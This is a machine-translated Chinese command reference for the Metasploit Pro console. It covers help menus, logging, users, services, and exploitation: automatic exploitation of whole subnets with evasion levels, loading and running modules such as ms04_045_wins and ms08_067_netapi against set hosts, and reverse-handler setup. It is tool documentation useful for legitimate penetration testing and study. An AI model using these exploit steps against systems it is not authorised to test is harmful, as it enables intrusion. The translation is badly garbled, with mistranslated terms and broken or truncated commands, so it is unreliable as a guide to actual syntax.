Metasploit总经理
箴控制台命令
这是一个常见的专业控制台命令列表,您可以使用作为一个快速参考。如果这里没有列出什么,输入帮助在控制台中查看所有选项的列表。
发射Metasploit
以下命令发射Metasploit辞职。
Windows上的发射
1
$ MSF > CD /metasploit . txt
2
$ MSF> Console.Bat
在Linux上推出
1
$ MSF > CD /opt/metasploit . sh /opt/metasploit . sh /opt/metasploit . sh
2
$ MSF > sudo msfpro
退出
1
$ MSF >退出
请参阅可用命令
1
MSF >帮助
您可以在任何命令前加上帮助,以查看可用选项列表。
1
MSF >帮助处理程序
2
3.
用途:处理程序(选项)
4
旋转一个负载处理程序作为后台作业。
5
选项:
6
7
-H 配置处理程序的RHOST/LHOST
8
-P 配置处理程序的RPORT/LPORT
9
-e 用于有效负载阶段编码的编码器
10.
- h帮助横幅
11.
-n 给处理程序作业的自定义名称
12.
-p 配置处理程序的有效负载
13.
-X建立会话后关闭处理程序
14.
15.
16.
MSF>帮助工作区
17.
18.
用法:
19.
工作区列表工作区
20.
workspace -v详细列出工作区
21.
workspace [name]切换工作区
22.
Workspace -a [name]…添加工作区(年代)
23.
工作空间-d [name]…删除工作区(年代)
24.
Workspace -d删除所有工作空间
25.
Workspace -R 重命名工作区
26.
workspace -h显示帮助信息
箴帮助页面
这些是所有可用的选项MSF >帮助.
1
无国界医生组织>帮助
2
3.
核心命令
4
=============.
5
6
命令的描述
7
------- -----------
8
还帮助菜单
9
显示一个很棒的metasploit横幅
10.
cd更改当前工作目录
11.
切换颜色
12.
connect与主机通信
13.
退出控制台
14.
get获取上下文相关变量的值
15.
getg获取全局变量的值
16.
grep grep另一个命令的输出
17.
帮助帮助菜单
18.
history显示命令历史记录
19.
加载一个框架插件
20.
退出控制台
21.
repeat重复命令列表
22.
通过会话路由路由流量
23.
save保存当前数据存储
24.
sessions转储会话列表,显示会话信息
25.
set将上下文相关的变量设置为一个值
26.
setg将全局变量设置为值
27.
在指定的秒数内不做任何事情
28.
将控制台输出写入文件和屏幕
29.
线程视图和操纵背景线程
30.
卸载框架插件
31.
unset取消设置一个或多个上下文相关的变量
32.
unsetg取消设置一个或多个全局变量
33.
version显示框架和控制台库版本号
34.
35.
36.
模块命令
37.
===============
38.
39.
命令的描述
40
------- -----------
41.
advanced显示一个或多个模块的高级选项
42.
back从当前上下文返回
43.
信息显示有关一个或多个模块的信息
44.
loadpath从路径中搜索并加载模块
45.
显示一个或多个模块的全局选项
46.
popm弹出堆栈中的最新模块,使其激活
47.
previous将之前加载的模块设置为当前模块
48.
PUSHM将主动或模块列表按到模块堆栈上
49.
reload_all从所有定义的模块路径重新加载所有模块
50.
search搜索模块名称和描述
51.
显示显示给定类型或所有模块的模块
52.
通过名称或搜索词/索引与模块进行交互
53.
54.
55.
工作命令
56.
============
57.
58.
命令的描述
59.
------- -----------
60.
作为job启动有效负载处理程序
61.
乔布斯显示并管理工作
62.
杀死完成工作
63.
rename_job重命名任务
64.
65.
66.
资源脚本命令
67.
========================
68.
69.
命令的描述
70
------- -----------
71.
makerc将启动后输入的命令保存到文件中
72.
resource执行文件中的命令
73.
74.
75.
开发人员命令
76.
==================
77.
78.
命令的描述
79.
------- -----------
80
edit使用首选编辑器编辑当前模块或文件
81.
在当前上下文中打开一个交互式的Ruby shell
82.
如果可能的话,将frame .log分页到最后
83.
打开当前模块或框架上的pry调试器
84.
reload_lib从指定路径重新加载Ruby库文件
85.
86.
87.
数据库后端命令
88.
=========================.
89.
90.
命令的描述
91.
------- -----------
92.
analyze分析指定地址或地址范围的数据库信息
93.
db_connect连接到现有数据库
94.
db_disconnect与当前数据库实例断开连接
95.
db_export导出包含数据库内容的文件
96.
db_import导入扫描结果文件(将自动检测到文件键)
97.
db_nmap自动执行nmap并记录输出
98.
db_rebuild_cache重建存储在数据库中的模块缓存
99.
db_status显示当前数据库状态
100.
hosts列出数据库中所有主机
101.
Loot列出数据库中的所有战利品
102.
列出数据库中所有的注释
103.
services列出数据库中所有的服务
104.
vulns列出数据库中所有的漏洞
105.
workspace在数据库工作空间之间切换
106.
107.
108.
凭证后端命令
109.
============================
110.
111.
命令的描述
112.
------- -----------
113.
列出数据库中所有的凭证
日志
下面的命令允许你控制日志Metasploit Pro。
从控制台记录输入和输出
使用Consologging.选项来存储专业控制台输入和输出到日志中的信息。
1
msf-pro > setg控制台日志y
2
控制台日志记录现在已经启用。
修改日志长度
使用LogLevel选项设置日志的详细程度。将值设置为1到5。
1
msf-pro >设置日志级别3
2
LogLevel = > 3
记录会话的输入和输出
使用SessionLogging选项将msfconsole输入和输出的关于会话的信息存储到日志中。
1
msf-pro >设置会话日志
2
会话日志将为将来的会话启用。
用户
以下命令涉及用户管理.
更改当前用户
使用pro_user.命令并提供用户名作为参数来更改当前用户。
1
MSF-Pro> Pro_User Joe
2
{*}修改pro_user为joe
查看用户列表
使用pro_user.命令和-L.选项查看用户列表。
1
Msf-pro > pro_user -l
2
用户名全名电子邮件管理员?
3.
======== ========= ===== ======
4
乔
5
约翰
运行服务
来停止、启动或重启服务,可以使用ctlscript.sh脚本.
1
msadmin@ubuntu: ~ $ sudo ' / opt / metasploit / ctlscript.sh '
2
用法:/ opt / metasploit / ctlscript.sh帮助
3.
/opt/metasploit/ctlscript.sh(开始|停止|重启|状态)
4
/ opt / metasploit / ctlscript.sh(开始| | |重新启动停止状态)postgresql
5
/ opt / metasploit / ctlscript.sh(开始| | |重新启动停止状态)prosvc
6
/ opt / metasploit / ctlscript.sh(开始| | |重新启动停止状态)metasploit
7
/ opt / metasploit / ctlscript.sh(开始| | |重新启动停止状态)工人
8
9
帮助 - 这个屏幕
10.
启动—启动服务
11.
停止-停止服务
12.
Restart—重新启动或启动服务
13.
###显示服务的状态
Metasploit开始:
/ opt / metasploit / ctlscript.sh开始
启动特定的服务:
/ opt / metasploit / ctlscript.sh开始工人
链的命令
使用参数- -X把命令串在一起。这只在启动Metasploit Pro时有效。该论点将在现有的Metasploit Pro会话中不起作用。使用;把命令串在一起。
1
$ sudo /opt/metasploit/msfpro——-x 'setg lhost 1.2.3.4'
2
$ sudo /opt/metasploit/msfpro -x 'use multi/handler;设置lport 3333;设置lhost eth0的
如果你少了两个破折号,- -X,命令失败了错误无效选项:-x(opectionParser :: InvalidOption).
利用
自动的利用
自动漏洞利用根据主机和漏洞数据选择漏洞。
运行一个自动漏洞通过主机IP地址作为选项。
1
Msf-pro > pro_exploit 192.168.184.139
为自动攻击定义主机黑名单使用-B.选择黑名单的选项。
1
MSF-Pro> Pro_exploit 192.168.184.0/24 -B 192.168.184.138
为自动攻击定义端口黑名单使用PB.选项指定要排除的端口列表。
1
Msf-pro > pro_exploit 192.168.184.0/24 -pb 22-23
执行一次自动利用的演练使用-D.执行自动漏洞的干燥运行的选项。
1
Msf-pro > pro_exploit 192.168.184.0/24 -d
设置自动利用的应用程序回避级别使用ea选项来设置自动利用的规避级别。你可以指定规避级别为'none', 'low', 'medium'和'high'。
1
MSF-Pro> Pro_exploit 192.168.184.0/24 -EA低
设置TCP逃避水平
使用等选项,设置TCP规避级别。你可以指定规避级别为'none', 'low', 'medium'和'high'。
1
MSF-Pro> Pro_exploit 192.168.184.0/24 -EA低
设置有效载荷连接类型
使用-M.选项设置自动利用的有效负载类型。有效负载类型有auto、bind和reverse
1
Msf-pro > pro_exploit 192.168.184.0/24 -m bind . txt
设置最小等级
使用-R.选项设置自动利用的有效负载类型。最低等级设置为“低”、“一般”、“正常”、“好”、“伟大”和“优秀”。
1
Msf-pro > pro_exploit 192.168.184.0/24 -r good
手动利用
手动利用是您配置为针对目标运行的利用。
搜索使用搜索与搜索操作员一起搜索模块
1
msf-pro >搜索平台:Windows
2
MSF-Pro>搜索类型:Exploit
3.
搜索引擎:Msf-pro >
4
Msf-pro >搜索应用:客户端
5
搜索名称:ms08-067
显示所有Exploit模块
使用显示命令查看可用的漏洞列表。此命令需要很长时间,因为有数以千计的漏洞模块可用。
1
Msf-pro >显示漏洞
加载模块使用使用命令来加载exploit模块。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
MSF-Pro Exploit(MS04_045_WINS)>
重置命令提示符使用回来命令重置提示符并删除当前加载的模块。
1
Msf-pro漏洞(ms04_045_wins) >回
2
msf-pro >
显示模块的选择使用显示命令查看可用于特定模块的选项列表。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
MSF-Pro Exploit(MS04_045_WINS)>显示选项
显示需要的选项要找出需要哪些选项,可以使用显示失踪命令。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
Msf-pro漏洞显示缺失
显示高级选项
使用显示命令查看可用于漏洞模块的高级选项列表。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
Msf-pro漏洞(ms04_045_wins
设置选项使用集命令配置模块的选项。需要指定选项名和选项值,如下图所示:
1
MSF-Pro Exploit(MS04_045_WINS)>显示选项
2
3.
名称当前设置必填描述
4
---- ------- ------- -------- ------------
5
RHOST
6
RPORT 445
7
8
MSF-Pro Exploit(MS04_045_WINS)> SET RHOST 192.168.55.1
显示模块目标使用显示目标命令,查看可能存在漏洞的目标列表。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
MSF-Pro Exploit(MS04_045_WINS)>显示目标
3.
4
开发目标:
5
身份证的名字
6
- -----
7
0 Windows 2000英语
检查目标的脆弱性使用检查命令,以确定目标是否容易受到特定漏洞的攻击。
1
Msf-pro >使用/windows/smb/ms08_067_netapi
2
Msf-pro漏洞(ms08_067_netapi) >检查192.168.55.1
3.
[+] 192.168.55.1:445 - 目标很脆弱。
设置攻击目标
使用设定目标命令指定攻击目标。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
MSF-Pro Exploit(MS04_045_WINS)>显示目标
3.
4
开发目标:
5
身份证的名字
6
- -----
7
0 Windows 2000英语
8
9
Msf-pro漏洞(ms04_045_wins) >设置目标0
运行一个利用使用利用或者运行命令运行exploit模块。
1
Msf-pro > use exploit/windows/wins/ms04_045_wins
2
MSF-Pro Exploit(MS04_045_WINS)>运行
重新加载一个利用
使用重新加载命令刷新利用漏洞的元数据和方法。
1
Msf-pro漏洞(ms04_045_wins
宿主
以下命令与主机.
发现扫描
使用pro_discover命令执行发现扫描。
1
Msf-pro > pro_discover 192.168.0.1
运行凭据扫描
如果您有要为Windows主机指定的SMB凭据,请使用以下命令。
-SD.选项定义SMB域。-su.Option指定用户名。-SP.选项指定密码。
1
Msf-pro > pro_discover 192.168.0.1 -sd workgroup -su root -sp root
查看主机
使用主机命令,查看数据库中包含的主机列表。
1
msf-pro >主机
添加一个主机
使用主机命令和-一种选项将主机添加到当前工作区。
1
MSF-Pro>主机-A 192.168.0.3
删除主机
使用主机命令和-D.选项从当前工作区删除主机:
1
Msf-pro >主机-d 192.168.0.3
连接主机
使用连接命令与主机通信。您必须提供要连接的主机地址和端口。
1
Msf-pro >连接192.168.0.1 22
查看已启动的主机
使用主机命令和-U选项查看正在运行的主机列表。
1
MSF-Pro> Hosts -U
项目
以下命令与管理项目Metasploit Pro。
创建一个项目
使用pro_project.命令和-一种选项来创建项目。您创建的项目将成为当前项目。
1
msf-pro > pro_project -a HR
查看当前项目
使用pro_project.命令查看当前项目。
1
msf-pro > pro_project
改变项目
使用pro_project.命令更改当前项目
如果需要指定包含空格的项目,则必须将项目名称包含在引号中。例如,使用pro_project“它dept”.
1
msf-pro > pro_project HR
删除一个项目
使用-D.选项删除项目。这将删除项目,其中包括主机、凭据、证据和与项目相关的任何其他数据。
1
msf-pro > pro_project -d ACC